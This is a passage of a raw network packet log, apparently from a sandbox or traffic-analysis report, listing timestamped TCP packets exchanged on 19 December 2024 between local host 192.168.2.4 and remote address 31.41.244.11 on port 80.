                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.506578922 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.506591082 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.506655931 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.506655931 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.508938074 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.509027004 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.509728909 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.509741068 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.509752035 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.509824991 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.509824991 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.511929989 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.511943102 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.512037039 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.512777090 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.512789011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.512896061 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.514499903 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.514590979 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.515182018 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.515196085 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.515207052 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.515248060 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.515311003 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.515808105 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.515820026 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.515830040 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.515841961 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.515876055 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.516011000 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.517997026 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.518009901 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.518057108 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.518115044 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.518115044 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.518939018 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.519032001 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.562763929 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.562875986 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.562901974 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.562913895 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.562973022 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.562973022 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.563324928 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.563335896 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.563379049 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.563744068 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.563755989 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.563798904 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.563827038 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.564225912 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.564237118 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.564248085 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.564291000 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.564291000 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.565115929 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.565205097 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.565311909 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.565372944 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.565427065 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.565438986 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.565448999 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.565479040 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.565562963 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.566262960 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.566330910 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.566353083 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.566365004 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.566402912 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.566435099 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.566656113 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.566709042 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.566848040 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.566859007 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.566870928 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.566921949 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.567001104 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.567715883 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.567728043 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.567744017 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.567769051 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.567801952 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.568572998 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.568587065 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.568667889 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.568959951 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.569055080 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.569159985 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.569170952 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.569181919 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.569220066 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.569258928 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.569842100 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.569854021 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.569921970 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.569921970 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.569936991 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.569978952 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.570591927 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.570605040 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.570616007 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.570636034 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.570734024 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.571391106 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.571403980 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.571563959 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.571850061 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.571862936 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.571877956 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.571897030 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.571943998 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.572962046 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.573019028 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.573039055 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.573050022 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.573096037 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.573209047 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.573734045 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.573746920 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.573796034 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.574120045 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.574152946 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.574166059 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.574172974 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.574203014 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.574273109 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.574742079 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.574754953 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.574765921 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.574799061 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.574829102 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.575508118 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.575520039 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.575531006 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.575542927 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.575567961 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.575608969 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.576275110 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.576288939 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.576301098 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.576366901 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.576366901 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.577121973 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.577133894 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.577145100 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.577189922 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.577203989 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.577804089 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.577816963 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.577828884 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.577841043 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.577872038 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.577909946 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.578574896 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.578588009 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.578695059 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.696171999 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.696223974 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.696238041 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.696382046 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.696595907 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.696610928 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.696686983 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.696687937 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.696918011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.696932077 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.696994066 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.697458029 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.697469950 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.697546005 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.697726011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.697736979 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.697774887 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.697787046 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.698226929 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.698239088 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.698272943 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.698273897 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.698312044 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.700126886 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.700139046 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.700150013 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.700242043 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.700242043 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.700937033 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.701040030 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.702455997 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.702466965 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.702527046 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.703242064 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.703253984 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.703318119 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.705203056 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.705276966 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.706276894 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.706289053 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.706300020 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.706360102 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.706506968 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.707503080 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.707518101 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.707528114 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.707540035 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.707568884 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.707653046 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.710165024 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.710175991 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.710189104 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.710269928 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.710269928 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.710755110 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.710838079 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.712126017 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.712140083 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.712197065 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.712197065 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.712671995 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.712683916 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.712752104 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.713289022 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.713301897 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.713366032 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.713790894 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.713804960 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.713911057 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.754331112 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.754414082 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.754429102 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.754443884 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.754528046 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.754831076 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.754895926 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.755093098 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.755106926 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.755150080 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.755177975 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.755528927 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.755589008 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.755661964 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.755840063 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.755913019 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.755925894 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.755939960 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.755984068 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.756028891 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.756695986 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.756710052 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.756822109 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.756822109 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.757206917 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.757220984 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.757296085 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.757507086 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.757519960 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.757582903 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.757582903 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.757931948 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.757946014 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.758002996 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.758377075 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.758388996 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.758400917 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.758455038 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.758482933 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.759067059 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.759265900 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.759289980 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.759303093 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.759322882 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.759363890 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.759412050 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.760166883 CET804974331.41.244.11192.168.2.4
